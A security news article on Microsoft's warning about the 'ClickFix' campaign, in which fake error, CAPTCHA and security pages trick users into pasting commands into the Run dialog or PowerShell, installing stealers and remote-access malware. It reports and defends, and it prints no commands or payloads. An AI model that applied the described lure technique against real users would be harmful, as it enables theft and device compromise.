.webp "ClickFix")
Microsoft security researchers are sounding the alarm about a sophisticated social engineering campaign called "ClickFix" that's successfully compromising thousands of enterprise and consumer devices globally every day by exploiting users' natural instinct to fix technical problems.
The technique tricks victims into manually executing malicious commands by presenting fake error messages, CAPTCHA verifications, or security prompts that appear to require user intervention. "Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions," Microsoft warned in a detailed threat analysis.
Unlike traditional malware that attempts to bypass security software, ClickFix manipulates users into becoming unwitting accomplices. Victims encounter seemingly legitimate error pages—often impersonating Microsoft Word, Google reCAPTCHA, or Cloudflare security checks—that instruct them to copy and paste commands into the Windows Run dialog (Win+R) or PowerShell to "fix" the issue.
 |
| HTML attachment displaying a Microsoft Word background and ClickFix lure |
The scam typically begins with phishing emails, malicious advertisements, or compromised websites that redirect users to convincing landing pages. Once users follow the fake troubleshooting instructions, malware like Lumma Stealer, AsyncRAT, or rootkits gets installed, enabling data theft, remote access, and system compromise.
Microsoft has observed threat actors selling ClickFix "builder kits" on underground forums for $200-$1,500 monthly, with sellers promising to bypass major security solutions, including Microsoft Defender SmartScreen. These kits offer customizable templates mimicking trusted brands and multi-language support.
The campaign has expanded beyond Windows to target macOS users with fake Spectrum cable company pages that steal passwords and install Atomic macOS Stealer (AMOS) malware.
 |
| Lampion infection chain |
Protection strategies include:
- Training users to recognize social engineering tactics
- Enabling Microsoft Defender SmartScreen warnings
- Configuring PowerShell execution policies to block unsigned scripts
- Using Group Policy to disable the Windows Run dialog where unnecessary
- Implementing attack surface reduction rules in Microsoft Defender XDR
Organizations should prioritize user education since technical controls alone cannot prevent attacks that rely on legitimate user actions to succeed.